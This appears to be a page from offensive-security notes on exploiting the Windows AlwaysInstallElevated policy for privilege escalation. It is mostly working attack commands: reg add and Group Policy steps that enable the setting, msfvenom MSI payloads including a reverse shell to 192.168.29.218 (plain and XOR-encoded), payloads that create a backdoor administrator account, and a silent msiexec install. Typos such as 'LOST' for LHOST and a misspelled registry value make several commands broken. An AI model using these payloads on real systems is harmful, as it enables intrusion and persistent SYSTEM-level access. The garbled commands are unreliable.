AlwaysInstalledEvevated Exploitation

If both the HKCU (Current user) and HKLM (local machine) registry keys are set to 0x1, windows allows MSI files to be installed with SYSTEM privileges, leading to local privilege escalation

Check Vulnerability status

reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstalledElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstalledElevated

Set the key (if you have permission)

reg add HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstalledElevated /t REG_DWORD /d 1 /f
reg add HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstalledElevated /t REG_DWORD /d 1 /f

Group Policy Configuration for AlwaysInstallElevated

The AlwaysInstalledElevated setting can be enabled via Group Policy Editor(gpedit.msc). When enabled for both the Computer and User configurations, that allows .msi files to be installed with elevated SYSTEm privileges, which can be exploited for local privilege escalation.

Enable Policy in Computer Configuration

navigated to following path

Local Computer Policy > 
    Computer Configuration > 
        Administrative Templates > 
            Windows Components > 
                Windows Installer > 
                    Always install with elevated privileges.

  • set this policy to Enabled

Enable Policy in User Configuration

Local Computer Policy > 
    User Configuration > 
        Administrative Templates > 
            Windows Components > 
                Windows Installer > 
                    Always install with elevated privileges.

  • set this policy to Enabled

gpupdate /force

msfvenom Payload Generation for AlwaysInstallElevated Exploitation

Reverse Shell Payload (Platform: windows/ Architecture : x64)

  • Basic reverse shell payloas as MSI

msfvenom -p windows/shell/reverse_tcp LOST=192.168.29.218 LPORT=443 -f msi -o setup.msi

  • XOR encoded reverse shell, executed via msi

msfvenom --platform windows --arch x64 --payload windows/shell/reverse_tcp LOST=192.168.29.218 LPORT=443 --encoder x64/xor --iteration 9 -f msi --out AlwaysInstallElevated.msi

Command Execution Payload (Run Local Commands)

  • add user 'test' to local administrator group

msfvenom -p windows/exec CMD='net localgroup administrators test /add' -f msi -o setup.msi

  • Create a new user DevNull with Password 'Password@123'

msfvenom -p windows/exec CMD='net user DevNull Password@123 /add' -f msi -o setup.msi

  • Add existing user 'DevNull' to administrators group

msfvenom -p windows/exec CMD='net localgroup administrator DevNull /add' -f msi -o setup.msi

  • Install MSI package via command prompt

msiexec /quiet /qn /i update.msi
Option
Meaning

msiexec

Windows Installer command line tool

/i

Specifies the MSI file to install (in this case update.msi)

/quiet

Runs the installer with no user interface (fully silent)

/qn

Equivalent to /quiet, explicitly sets UI level to "no UI"

PreviousRegistry Exploitation TechniquesNextAutorun Registry Persistence

Last updated